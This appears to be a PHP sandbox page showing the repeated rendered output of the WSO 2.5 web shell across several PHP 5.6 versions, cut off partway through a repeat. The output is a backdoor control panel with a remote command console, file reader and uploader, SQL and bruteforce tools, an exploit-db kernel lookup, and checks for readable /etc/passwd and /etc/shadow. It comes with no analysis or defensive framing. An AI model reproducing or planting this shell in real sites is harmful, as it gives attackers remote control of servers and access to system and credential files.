</style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.16 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.15
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.15 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.14
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.14 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.13
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.13 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.12
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if 